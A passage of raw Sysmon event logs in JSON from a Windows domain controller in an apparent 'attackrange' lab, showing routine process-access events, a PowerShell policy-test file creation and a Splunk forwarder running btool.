06:49:16.515","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.516\r\nSourceProcessGUID: {E2A3D6B1-1062-5F25-0000-001018990200}\r\nSourceProcessId: 2444\r\nSourceThreadId: 2292\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.516","SourceProcessGUID":"{E2A3D6B1-1062-5F25-0000-001018990200}","SourceProcessId":"2444","SourceThreadId":"2292","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.538\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.538","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.538\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001064670300}\r\nSourceProcessId: 3920\r\nSourceThreadId: 3924\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.538","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001064670300}","SourceProcessId":"3920","SourceThreadId":"3924","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.552\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nProcessId: 3948\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_phlcjixp.3uo.ps1\r\nCreationUtcTime: 2020-08-01 06:49:16.552","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.552","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_phlcjixp.3uo.ps1","CreationUtcTime":"2020-08-01 06:49:16.552","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.583\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.583","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.583\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010CA730300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.583","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010CA730300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.612\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nProcessId: 4044\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nParentProcessId: 3864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.612","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","ParentProcessId":"3864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nSourceProcessId: 3864\r\nSourceThreadId: 3868\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","SourceProcessId":"3864","SourceThreadId":"3868","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
